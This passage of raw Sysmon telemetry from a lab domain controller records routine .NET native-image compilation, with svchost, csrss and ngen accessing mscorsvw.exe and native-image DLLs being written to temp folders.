Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:10.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924E-6005-6104-00000000A301}4712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:10.835{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924E-6005-6104-00000000A301}4712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:10.835{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924E-6005-6104-00000000A301}4712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:10.757{59A5CD1D-924E-6005-6004-00000000A301}3676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e5c-0\System.ServiceModel.Activation.dll2021-01-18 13:51:10.757 10341000x80000000000000008649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:10.241{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924E-6005-6004-00000000A301}3676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:10.241{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924E-6005-6004-00000000A301}3676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:10.226{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924E-6005-6004-00000000A301}3676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:12.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9250-6005-6604-00000000A301}996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:12.819{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9250-6005-6604-00000000A301}996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:12.819{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9250-6005-6604-00000000A301}996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:12.710{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9250-6005-6504-00000000A301}1372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:12.694{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9250-6005-6504-00000000A301}1372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:12.694{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9250-6005-6504-00000000A301}1372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:12.632{59A5CD1D-9250-6005-6404-00000000A301}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b34-0\System.ServiceModel.Channels.dll2021-01-18 13:51:12.632 10341000x80000000000000008663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:12.319{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9250-6005-6404-00000000A301}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:12.304{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9250-6005-6404-00000000A301}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:12.304{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9250-6005-6404-00000000A301}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:12.163{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9250-6005-6304-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:12.148{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9250-6005-6304-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:12.148{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9250-6005-6304-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:12.054{59A5CD1D-924E-6005-6204-00000000A301}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13ec-0\System.ServiceModel.Activities.dll2021-01-18 13:51:12.054 10341000x80000000000000008681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:13.960{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9251-6005-6904-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:13.944{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9251-6005-6904-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:13.944{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9251-6005-6904-00000000A301}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:13.882{59A5CD1D-9251-6005-6804-00000000A301}3104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c20-0\System.ServiceModel.Internals.dll2021-01-18 13:51:13.882 10341000x80000000000000008677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
